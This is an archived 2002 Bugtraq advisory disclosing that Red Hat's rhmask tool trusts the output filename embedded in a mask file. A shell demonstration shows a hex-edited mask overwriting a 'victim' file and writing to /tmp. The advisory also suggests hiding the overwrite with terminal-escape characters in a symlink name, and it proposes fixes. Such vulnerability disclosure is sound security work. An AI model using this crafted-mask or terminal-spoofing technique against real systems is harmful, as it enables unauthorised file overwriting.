linux, säkerhet

8582104 2002-06-11 17:56 +1000  /142 rader/ Andrew Griffiths <andrewg@tasmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-11  18:39  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22576>
Ärende: RHmask
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200206110756.g5B7ugv29999@franklin.nt.tas.gov.au>

Program: rhmask
Version: 1.0-9
Distro: Redhat 7.1 (didn't come pre-installed on my installation.)

DESCRIPTION
-----------

       rhmask  is  intended to allow the distribution of files as
       masks against other files. This lets new versions of soft-
       ware  be freely distributed on public internet servers but
       limits their usefulness to those who already have  a  copy
       of  the  package. It uses a simple XOR scheme for creating
       the file mask and uses file size and md5  sums  to  ensure
       the integrity of the result.

SYNOPSIS
--------

       rhmask <infile> <maskfile>
       rhmask -d <infile> <outfile> <maskfile>



Problem:
--------

rhmask will blindly trust the output filename in the mask given
to it. This
allows, for example, overwriting of /etc/passwd (or creatation).
(Subject to the priviledges that ran rhmask , of course).

Vendor Status
-------------

The author (Erik Troan, ewt@redhat.com) was informed about this a
couple of months ago, and he told me this was a non-issue as
RedHat where moving to a different system.

Notes:
------

Files created will be created with 0666 (subject to your umask).
If a person
has a umask of 0, files will be readable + writable by all. (duh)

rhmask takes different filesizes.

Demonstration:
--------------

[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >old_file
> this is the old version
> _EOF_
[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >new_file
> this is the new version
> _EOF_
[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >victim
> I'm a helpless victim file
> _EOF_
[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask
[andrewg@blackhole rhmask_test]$ rm -f new_file
[andrewg@blackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating new_file
[andrewg@blackhole rhmask_test]$ cat new_file
this is the new version
[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2new_file
[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask

[ ht is a binary editor for linux ]

[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2victim
[andrewg@blackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating victim
[andrewg@blackhole rhmask_test]$ cat victim
this is the new version

[ you killed kenny! ]

[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask [andrewg@blackhole rhmask_test]$ ht
replace_old_file.mask [andrewg@blackhole rhmask_test]$ strings
replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2/tmp/ile
[andrewg@blackhole rhmask_test]$ rm -f /tmp/ile [andrewg@blackhole
rhmask_test]$ rhmask old_file replace_old_file.mask generating
/tmp/ile [andrewg@blackhole rhmask_test]$ cat /tmp/ile this is the
new version

Fix:
----

Firstly, have it ignore or complain about slashes in the
filename. Have it
prompt you if the target filename is a symbolic link.

[ In my oponion, sign the maskfile & make sure you check the
signature before
  using it. Oh, and don't obtain the maskfile + signature +
public key of the person from
  the same place. ]

Severity:
---------

Well, this part being the most subjective, I would say its rather
low, as it
tells you the file name as it does it. However, since it also
follows symlinks,
you could probably make a /tmp symlink with terminal characaters
in to
overwrite the filename. Possibly along the lines of a file of
'/tmp/symlink^Mgenerating harmless' which should output
"generating harmless"
to appear... however, when harmless doesn't appear or hasn't
changed their
will be most likely suspicion. file also has the same problem
with terminal
charaters in the data it reads and outputs.

Greets:
-------

zen-parse, jaguar



--
www.tasmail.com
(8582104) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)